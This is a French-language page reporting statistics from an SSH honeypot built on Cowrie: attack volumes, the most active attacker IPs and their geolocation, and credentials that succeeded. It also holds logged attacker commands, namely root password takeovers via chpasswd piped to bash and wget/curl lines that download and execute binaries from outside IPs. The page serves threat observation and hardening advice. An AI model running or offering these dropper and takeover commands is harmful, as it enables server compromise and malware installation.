Voici une petite présentation de notre honeypot:
C’est un honeypot ssh basé sur cowrie. Il a été mise en service le 1 avril 2020 car nous avons pensé que c’est une des meilleures plaisanteries à faire dans cette période de confinement – la preuve, il est toujours fonctionnel et grâce à lui, nous pouvons apprendre d’avantage au sujet des cybermenaces.
Ce tableau représente l'activité globale de notre honeypot, ce qui correspond à son activité générale depuis sa mise en ligne.
| Informations générales | |||||||||
|---|---|---|---|---|---|---|---|---|---|
| Nombre total des cyberattaques | 1807027 | ||||||||
| Nombre total des attaquants (IP unique) | 37144 | ||||||||
| La premère cyberattaque a débutée | Wednesday, 01-Apr-2020, 15:29 (GTM +1) | ||||||||
| La dernière cyberattaque a débutée | Saturday, 23-Jan-2021, 05:22 (GTM +1) | ||||||||
| Informations journalières | |
|---|---|
| Heure locale du honeypot | Saturday, 23-01-21, 05:23 (GTM +1) |
| Nombre des cyberattaques d'aujourd'hui | 2666 |
| Attaquant récent | 51.79.164.102 |
| Provenance géographique du dernier attaquant | Canada (CA) |
Voici la représentation graphique de l'activité quotidienne de notre honeypot. Les points indiquent le nombre des cyberattaques par jour.
Le graphique ci-dessous représente les vingt jours de plus grand nombre des cyberattaques enregistrées par notre honeypot.
Nous pouvons visualiser aussi la représentation graphique des dix combinaisons des noms d'utilisateurs et des mots de passe, le plus souvent utilisées par les attaquants. C'est le gaphique ci-dessous.
Nous allons choisir les dix plus grands attaquants dans la base des données de notre honeypot et procéder à leurs géolocalisation. Nous allons entrer ces données dans le tableau ci-dessous:
| Informations au sujet de la géolocalisation et classement des dix attaquats le plus actifs | |||||||||
|---|---|---|---|---|---|---|---|---|---|
| N° | Adresse IP | Attaques | Ville | Région | Pays | Code | Latitude | Longitude | nom d'hôte |
| 112.85.42.232 | 44496 | Xinpu | Jiangsu | China | CN | 34.5997 | 119.1594 | 112.85.42.232 | |
| 112.85.42.238 | 34909 | Xinpu | Jiangsu | China | CN | 34.5997 | 119.1594 | 112.85.42.238 | |
| 49.88.112.110 | 32701 | Shanghai | Shanghai | China | CN | 31.0449 | 121.4012 | 49.88.112.110 | |
| 112.85.42.229 | 27705 | Xinpu | Jiangsu | China | CN | 34.5997 | 119.1594 | 112.85.42.229 | |
| 142.93.8.147 | 11136 | North Bergen | New Jersey | United States | US | 40.793 | -74.0247 | 142.93.8.147 | |
| 89.163.148.93 | 10525 | Simmern | Rheinland-Pfalz | Germany | DE | 49.982 | 7.5235 | ju093.jupiter.servdiscount-customer.com | |
| 45.227.255.204 | 10417 | Panama | PA | 9 | -80 | hosting-by.web4net.org | |||
| 121.178.197.109 | 10219 | Yeongam-gun | Jeollanam-do | South Korea | KR | 34.7979 | 126.6265 | 121.178.197.109 | |
| 191.239.251.246 | 8807 | Campinas | Sao Paulo | Brazil | BR | -22.9056 | -47.0608 | 191.239.251.246 | |
| 69.158.207.141 | 8247 | Canada | CA | 43.6319 | -79.3716 | fff.tdlab.ca | |||
Afin de visualiser le volume des cyberattaques de chaqun d'entre eux, nous allons ajouter les codes des pays (à deux lettres) après leurs adresses IP. Nous obtiendrons ainsi leurs provenance géographique.
Sur le graphique ci-dessous, nous pouvons voir le volume des cyberattaques ainsi que les données de la géolocalisation des attaquant les plus actifs.
Ceci nous premet d'afficher les données du volume des cyberattaques en fonction des pays de leurs origines. Ci-dessous nous avons alors la représentation graphique du volume global des cyberattaques en fonction la géolocalisation des attaquants les plus actifs.
Certains attaquants ont réussi à trouver les bonnes combinaisons login/mot de passe, ce qui nous a permis d'observer leurs attaques. Voici la présentation des certaines données recueillies:
Voici la représentation graphique du ratio des cyberattaques "réussies". Pour cela, regardons le graphique présent ci-dessous.
Ci-dessous, nous trouvons le graphique affichant les intrusions hébdomadaires enregistrées par notre honeypot. Les points de la courbe indiquent le nombre total d'intrusions dans la même jornée.
Le graphique ci-dessous affiche les vingt jours ayant le plus grand nombres d'intrusions. Les chiffres indiquent combien de fois des informations d'identification correctes (login et mot de passe) ont été saisies par les attaquants.
Le graphe ci-dessous affiche le nombre d'intrusions réussies à partir de la même adresse IP. Les nombres indiquent combien de fois le même attaquant avait réussi d'ouvrir la session en saisissant le login et mot de passe correctement.
Nous allons procéder à la géolocalisation des adresses IP des dix attaquants, qui ont le taux de réussite le plus important.
| Informations au sujet des ressources et de la géolocalisation des dix attaquants ayant le plus grand nombe d'intrusions | |||||||||
|---|---|---|---|---|---|---|---|---|---|
| N° | Vu pour la dernière fois | Adresse IP | Pays | Total Intrusions | Dernier Login utilisé | Dernier Mot de passe utilisé | |||
| Thursday, 08-Oct-2020, 19:04 (GTM +1) | 112.85.42.232 | China | root | 1qaz@WSX3edc$RFV | |||||
| Friday, 22-Jan-2021, 21:08 (GTM +1) | 49.88.112.110 | China | root | 1qaz2wsx123 | |||||
| Friday, 22-Jan-2021, 21:13 (GTM +1) | 154.223.167.54 | Hong Kong | root | 1qaz2wsx123 | |||||
| Sunday, 20-Sep-2020, 06:47 (GTM +1) | 112.85.42.229 | China | root | 1qaz2wsx123 | |||||
| Thursday, 24-Sep-2020, 07:57 (GTM +1) | 112.85.42.238 | China | root | 1qaz2wsx123 | |||||
| Monday, 10-Aug-2020, 14:46 (GTM +1) | 98.159.99.227 | United States | root | 1qaz@WSX3edc$RFV | |||||
| Tuesday, 01-Sep-2020, 14:20 (GTM +1) | 98.159.99.25 | United States | root | 1qaz2wsx123 | |||||
| Thursday, 17-Sep-2020, 20:25 (GTM +1) | 98.159.110.232 | United States | root | 1qaz@WSX3edc$RFV | |||||
| Sunday, 21-Jun-2020, 19:56 (GTM +1) | 98.159.99.49 | United States | root | 1qaz@WSX3edc$RFV | |||||
| Tuesday, 01-Sep-2020, 09:38 (GTM +1) | 98.159.99.50 | United States | root | 1qaz@WSX3edc$RFV | |||||
Dans ce tableau, nous pouvons voir aussi les derniers mots de passe utilisés par les attaquants qui leurs ont permis d'accéder au système. Remarquez que se sont les mots de passe "standard" utilisés par beaucoup de professionels de l'infogérance (je ne vais pas citer les noms ici...).
Pour admirer les dix "combinaisons gagnantes", regardons le graphique ci-dessous.
Par cette petite experience, nous avons démontré que l'authentification par login et mot de passe n'est pas une méthode de protection suffisante. Afin de mieux protéger notre système contre ces cyberattaques, la méthode des clefs et/ou deuxième facteur d'authentification sera le meilleur choix. Il est également risqué d'autoriser le login "root" dans la configuration du serveur ssh.
Certains attaquants vont essayer de détourner "notre serveur" afin de s’en servir de relais pour mener des actions cybercriminelles et malveillantes, ou tout simplement, utiliser nos ressources pour miner la crypto-monnaie. Ces attaques sont de plus en plus fréquentes et ça arrive plus souvent qu'on y croit. Ce ne sont pas que de grandes entreprises qui sont visées. Nous allons voir ce que les attaquants espèrent d'obtenir en s'attaquant à notre "serveur". La plupart d'attaques est faite par les bots. Le problème de ces attaques est la saturation de la bande passante du serveur. Cependant ici, nous allons visualiser les véritables intrusions et tentatives de détournement du système. Contrairement aux idées reçues à ce sujet, ça arrive beaucoup plus souvent qu'on y pense.
Le graphique du dessous montre une "activité humaine" journalière. Il prends en compte le nombre d'intrusions dans le système pour chaque jour de fonctionnement du honeypot. Ici il s'agit des véritables tentatives de prise de contrôle de notre "serveur".
Le tableau ci-dessous montre les dix commandes "passwd et chpasswd" utilisées par les attaquants affin de modifier le mot de passe et prendre le contrôle totale de notre serveur.
| ID | Date | Les dix dernières commandes "passwd & chpasswd" |
|---|---|---|
| Saturday, 23-Jan-2021, 04:40 | echo "1qaz2wsx\nLxULsFMLeRq9\nLxULsFMLeRq9\n"|passwd | |
| Saturday, 23-Jan-2021, 04:40 | echo -e "1qaz2wsx\nLxULsFMLeRq9\nLxULsFMLeRq9"|passwd|bash | |
| Saturday, 23-Jan-2021, 04:05 | echo "root:owaz1L8SYwCN"|chpasswd|bash | |
| Saturday, 23-Jan-2021, 02:21 | echo "1qaz2wsx\nPUrbHaZY7cXo\nPUrbHaZY7cXo\n"|passwd | |
| Saturday, 23-Jan-2021, 02:21 | echo -e "1qaz2wsx\nPUrbHaZY7cXo\nPUrbHaZY7cXo"|passwd|bash | |
| Friday, 22-Jan-2021, 21:32 | echo "root:efvZqpgzv74x"|chpasswd|bash | |
| Friday, 22-Jan-2021, 21:18 | echo "root:qDvNOTtWCEyb"|chpasswd|bash | |
| Monday, 08-Jun-2020, 13:29 | echo "root:iAcRv9ho2vai"|chpasswd|bash | |
| Sunday, 07-Jun-2020, 18:04 | echo "root:rU73KDvqwbJq"|chpasswd|bash | |
| Friday, 05-Jun-2020, 04:37 | echo "root:lOvkrC6fkjyQ"|chpasswd|bash |
Le tableau suivant affiche les dix commandes le plus fréquemment utilisées par les attaquants. Cela sert à effectuer un repèrage simplifié. Remarquez que beaucoup de commandes, ce sont celles qui indiquent le type du processeur utilisé et la quantité de mémoire installée, ce qui est très utile pour installer un crypto-miner (monnaie viruelle).
| N° | Les dix commandes fréquemment utilisées (général) | Nombre d'entrées |
|---|---|---|
| /bin/eyshcjdmzg | ||
| ls -la /var/run/gcc.pid | ||
| /usr/bin/tar Pxvf - | ||
| cat /proc/cpuinfo | grep name | wc -l | ||
| cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' | ||
| cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;} | ||
| free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' | ||
| free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7} | ||
| ls -lh $(which ls) | ||
| which ls |
Le tableau du dessous affiche dix dernières commandes wget. Il s'agit bien des malwares que les attaquants tentent de nous faire télécharger afin de les installer dans notre système. Ces malwares pouraient être des backdoors, comme aussi des crypto-miners.
| N° | Date | Les dix dernières commandes "wget" |
|---|---|---|
| 1 | 22-Jan-2021 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.105.55/23; curl -O http://98.159.105.55/23; chmod +x 23; ./23; |
| 2 | 11-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.47/8000; curl -O http://98.159.99.47/8000; chmod +x 8000; ./8000; |
| 3 | 11-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/53; curl -O http://98.159.99.39/53; chmod +x 53; ./53; |
| 4 | 10-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.47/53; curl -O http://98.159.99.47/53; chmod +x 53; ./53; |
| 5 | 10-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3306; curl -O http://98.159.99.39/3306; chmod +x 3306; ./3306; |
| 6 | 10-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3306; curl -O http://98.159.99.39/3306; chmod +x 3306; ./3306; |
| 7 | 09-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3309; curl -O http://98.159.99.39/3309; chmod +x 3309; ./3309; |
| 8 | 08-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.12/3309; curl -O http://98.159.99.12/3309; chmod +x 3309; ./3309; |
| 9 | 08-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.39/3308; curl -O http://98.159.99.39/3308; chmod +x 3308; ./3308; |
| 10 | 07-Jun-2020 | #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://98.159.99.12/3308; curl -O http://98.159.99.12/3308; chmod +x 3308; ./3308; |
Voilà, notre petite "visite guidée" touche à sa fin. Soyez prudents et ne négligez pas les risques cyber. La cybermenace est bien réelle et les attaquants ne seront jamais gentils avec vous.
